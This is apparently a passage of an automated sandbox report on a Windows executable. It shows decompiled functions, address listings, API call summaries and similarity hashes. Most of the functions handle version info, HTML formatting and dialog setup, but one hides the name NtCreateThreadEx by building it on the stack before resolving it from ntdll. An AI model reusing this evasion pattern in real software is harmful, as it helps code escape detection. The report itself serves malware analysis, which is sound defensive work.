                                                                                                                                                                                                                          0x0040b0c1
                                                                                                                                                                                                                          0x0040b0c4
                                                                                                                                                                                                                          0x0040b0c7
                                                                                                                                                                                                                          0x0040b0ca
                                                                                                                                                                                                                          0x0040b0cd
                                                                                                                                                                                                                          0x0040b0cd
                                                                                                                                                                                                                          0x0040b0e5
                                                                                                                                                                                                                          0x0040b11f
                                                                                                                                                                                                                          0x0040b128
                                                                                                                                                                                                                          0x0040b0e7
                                                                                                                                                                                                                          0x0040b0e7
                                                                                                                                                                                                                          0x0040b0f1
                                                                                                                                                                                                                          0x0040b0f2
                                                                                                                                                                                                                          0x0040b0f3
                                                                                                                                                                                                                          0x0040b0fb
                                                                                                                                                                                                                          0x0040b0fd
                                                                                                                                                                                                                          0x0040b0fe
                                                                                                                                                                                                                          0x0040b11d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040b11d
                                                                                                                                                                                                                          0x0040b13c
                                                                                                                                                                                                                          0x0040b151
                                                                                                                                                                                                                          0x0040b166
                                                                                                                                                                                                                          0x0040b17b
                                                                                                                                                                                                                          0x0040b190
                                                                                                                                                                                                                          0x0040b1a5
                                                                                                                                                                                                                          0x0040b1ba
                                                                                                                                                                                                                          0x0040b1cf
                                                                                                                                                                                                                          0x0040b1d6
                                                                                                                                                                                                                          0x0040b1d7
                                                                                                                                                                                                                          0x0040b1d8
                                                                                                                                                                                                                          0x0040b1de
                                                                                                                                                                                                                          0x0040b1e3

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                                                                                                                          • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                                                                                                                          • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040B128
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                          • API String ID: 1223191525-1542517562
                                                                                                                                                                                                                          • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                                                                                                                          • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                                                          			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                                                                                                                                                          0x0040a1f8
                                                                                                                                                                                                                          0x0040a26d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040a26f
                                                                                                                                                                                                                          0x0040a205
                                                                                                                                                                                                                          0x0040a20b
                                                                                                                                                                                                                          0x0040a20d
                                                                                                                                                                                                                          0x0040a213
                                                                                                                                                                                                                          0x0040a214
                                                                                                                                                                                                                          0x0040a215
                                                                                                                                                                                                                          0x0040a216
                                                                                                                                                                                                                          0x0040a217
                                                                                                                                                                                                                          0x0040a219
                                                                                                                                                                                                                          0x0040a21f
                                                                                                                                                                                                                          0x0040a223
                                                                                                                                                                                                                          0x0040a227
                                                                                                                                                                                                                          0x0040a22b
                                                                                                                                                                                                                          0x0040a22f
                                                                                                                                                                                                                          0x0040a233
                                                                                                                                                                                                                          0x0040a237
                                                                                                                                                                                                                          0x0040a23b
                                                                                                                                                                                                                          0x0040a23f
                                                                                                                                                                                                                          0x0040a243
                                                                                                                                                                                                                          0x0040a247
                                                                                                                                                                                                                          0x0040a24b
                                                                                                                                                                                                                          0x0040a24f
                                                                                                                                                                                                                          0x0040a253
                                                                                                                                                                                                                          0x0040a257
                                                                                                                                                                                                                          0x0040a25b
                                                                                                                                                                                                                          0x0040a25f
                                                                                                                                                                                                                          0x0040a269
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040a26c
                                                                                                                                                                                                                          0x0040a271

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                                                                                                                          • API String ID: 2574300362-1257427173
                                                                                                                                                                                                                          • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                                                                                                                          • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                                                          			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                                                                                                                                                          0x00407f9b
                                                                                                                                                                                                                          0x00407fa3
                                                                                                                                                                                                                          0x00407fad
                                                                                                                                                                                                                          0x00407fb9
                                                                                                                                                                                                                          0x0040802e
                                                                                                                                                                                                                          0x00408032
                                                                                                                                                                                                                          0x00408038
                                                                                                                                                                                                                          0x0040803e
                                                                                                                                                                                                                          0x00407fbb
                                                                                                                                                                                                                          0x00407fc9
                                                                                                                                                                                                                          0x00407fd0
                                                                                                                                                                                                                          0x00407fe0
                                                                                                                                                                                                                          0x00407fe5
                                                                                                                                                                                                                          0x00407ff7
                                                                                                                                                                                                                          0x00408015
                                                                                                                                                                                                                          0x0040801b
                                                                                                                                                                                                                          0x00408021
                                                                                                                                                                                                                          0x00408021
                                                                                                                                                                                                                          0x00408051
                                                                                                                                                                                                                          0x00408051
                                                                                                                                                                                                                          0x00408059
                                                                                                                                                                                                                          0x00408065
                                                                                                                                                                                                                          0x00408069
                                                                                                                                                                                                                          0x0040806f
                                                                                                                                                                                                                          0x00408087
                                                                                                                                                                                                                          0x00408087
                                                                                                                                                                                                                          0x0040809c
                                                                                                                                                                                                                          0x004080bb
                                                                                                                                                                                                                          0x004080d1
                                                                                                                                                                                                                          0x004080de
                                                                                                                                                                                                                          0x004080e2
                                                                                                                                                                                                                          0x004080ea
                                                                                                                                                                                                                          0x004080fb
                                                                                                                                                                                                                          0x00408105
                                                                                                                                                                                                                          0x00408115
                                                                                                                                                                                                                          0x00408121
                                                                                                                                                                                                                          0x00408127
                                                                                                                                                                                                                          0x00408150

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407FD0
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407FE5
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                                                                                                                          • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                                                                                                                          • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 004080B4
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 004080D1
                                                                                                                                                                                                                          • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 304928396-0
                                                                                                                                                                                                                          • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                                                                                                                          • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                                                          			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                                                                                                                                          0x0040ae90
                                                                                                                                                                                                                          0x0040aeab
                                                                                                                                                                                                                          0x0040aeb2
                                                                                                                                                                                                                          0x0040aec0
                                                                                                                                                                                                                          0x0040aec7
                                                                                                                                                                                                                          0x0040aecc
                                                                                                                                                                                                                          0x0040aed3
                                                                                                                                                                                                                          0x0040aeda
                                                                                                                                                                                                                          0x0040aee1
                                                                                                                                                                                                                          0x0040aee1
                                                                                                                                                                                                                          0x0040aee7
                                                                                                                                                                                                                          0x0040aeea
                                                                                                                                                                                                                          0x0040aeed
                                                                                                                                                                                                                          0x0040aef9
                                                                                                                                                                                                                          0x0040aefe
                                                                                                                                                                                                                          0x0040af05
                                                                                                                                                                                                                          0x0040af07
                                                                                                                                                                                                                          0x0040af08
                                                                                                                                                                                                                          0x0040af13
                                                                                                                                                                                                                          0x0040af18
                                                                                                                                                                                                                          0x0040af19
                                                                                                                                                                                                                          0x0040af26
                                                                                                                                                                                                                          0x0040af2b
                                                                                                                                                                                                                          0x0040af2b
                                                                                                                                                                                                                          0x0040af2e
                                                                                                                                                                                                                          0x0040af34
                                                                                                                                                                                                                          0x0040af43
                                                                                                                                                                                                                          0x0040af44
                                                                                                                                                                                                                          0x0040af4f
                                                                                                                                                                                                                          0x0040af54
                                                                                                                                                                                                                          0x0040af55
                                                                                                                                                                                                                          0x0040af62
                                                                                                                                                                                                                          0x0040af67
                                                                                                                                                                                                                          0x0040af70
                                                                                                                                                                                                                          0x0040af76
                                                                                                                                                                                                                          0x0040af7a
                                                                                                                                                                                                                          0x0040af82
                                                                                                                                                                                                                          0x0040af88
                                                                                                                                                                                                                          0x0040af8d
                                                                                                                                                                                                                          0x0040af97
                                                                                                                                                                                                                          0x0040af9f
                                                                                                                                                                                                                          0x0040afa5
                                                                                                                                                                                                                          0x0040afa9
                                                                                                                                                                                                                          0x0040afb1
                                                                                                                                                                                                                          0x0040afb7
                                                                                                                                                                                                                          0x0040afbd

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                          • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                          • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                                                                                                                          • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                          			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                                                                                                                                          0x00403c09
                                                                                                                                                                                                                          0x00403c0c
                                                                                                                                                                                                                          0x00403c11
                                                                                                                                                                                                                          0x00403c1b
                                                                                                                                                                                                                          0x00403c3f
                                                                                                                                                                                                                          0x00403c4a
                                                                                                                                                                                                                          0x00403c6e
                                                                                                                                                                                                                          0x00403c96
                                                                                                                                                                                                                          0x00403c9a
                                                                                                                                                                                                                          0x00403ca6
                                                                                                                                                                                                                          0x00403cb3
                                                                                                                                                                                                                          0x00403cb8
                                                                                                                                                                                                                          0x00403cc5
                                                                                                                                                                                                                          0x00403cca
                                                                                                                                                                                                                          0x00403cdd
                                                                                                                                                                                                                          0x00403ce6
                                                                                                                                                                                                                          0x00403cf8
                                                                                                                                                                                                                          0x00403d11
                                                                                                                                                                                                                          0x00403d26
                                                                                                                                                                                                                          0x00403d3f
                                                                                                                                                                                                                          0x00403d54
                                                                                                                                                                                                                          0x00403d6d
                                                                                                                                                                                                                          0x00403d76
                                                                                                                                                                                                                          0x00403d88
                                                                                                                                                                                                                          0x00403d9e
                                                                                                                                                                                                                          0x00403db0
                                                                                                                                                                                                                          0x00403db5
                                                                                                                                                                                                                          0x00403dc4
                                                                                                                                                                                                                          0x00403dc8
                                                                                                                                                                                                                          0x00403dc9
                                                                                                                                                                                                                          0x00403dca
                                                                                                                                                                                                                          0x00403dda
                                                                                                                                                                                                                          0x00403ddf
                                                                                                                                                                                                                          0x00403de2
                                                                                                                                                                                                                          0x00403de3
                                                                                                                                                                                                                          0x00403df4
                                                                                                                                                                                                                          0x00403df8
                                                                                                                                                                                                                          0x00403df9
                                                                                                                                                                                                                          0x00403dfa
                                                                                                                                                                                                                          0x00403e0a
                                                                                                                                                                                                                          0x00403e0f
                                                                                                                                                                                                                          0x00403e12
                                                                                                                                                                                                                          0x00403e13
                                                                                                                                                                                                                          0x00403e22
                                                                                                                                                                                                                          0x00403e26
                                                                                                                                                                                                                          0x00403e28
                                                                                                                                                                                                                          0x00403e29
                                                                                                                                                                                                                          0x00403e39
                                                                                                                                                                                                                          0x00403e3e
                                                                                                                                                                                                                          0x00403e41
                                                                                                                                                                                                                          0x00403e42
                                                                                                                                                                                                                          0x00403e51
                                                                                                                                                                                                                          0x00403e55
                                                                                                                                                                                                                          0x00403e57
                                                                                                                                                                                                                          0x00403e58
                                                                                                                                                                                                                          0x00403e68
                                                                                                                                                                                                                          0x00403e6d
                                                                                                                                                                                                                          0x00403e70
                                                                                                                                                                                                                          0x00403e71
                                                                                                                                                                                                                          0x00403e71
                                                                                                                                                                                                                          0x00403e87
                                                                                                                                                                                                                          0x00403e8d
                                                                                                                                                                                                                          0x00403e9e
                                                                                                                                                                                                                          0x00403ea6
                                                                                                                                                                                                                          0x00403eaf
                                                                                                                                                                                                                          0x00403ebc

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                                                                                                                            • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                                                                                                                            • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                                                                                                                            • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                                                                                                                          • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                                                                                                                          • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
